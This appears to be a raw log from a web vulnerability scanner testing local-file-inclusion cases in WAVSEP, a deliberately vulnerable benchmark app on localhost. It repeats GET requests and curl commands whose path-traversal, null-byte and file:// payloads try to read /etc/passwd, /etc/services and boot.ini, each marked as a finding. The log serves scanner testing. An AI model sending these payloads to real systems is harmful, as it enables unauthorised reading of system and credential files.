GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
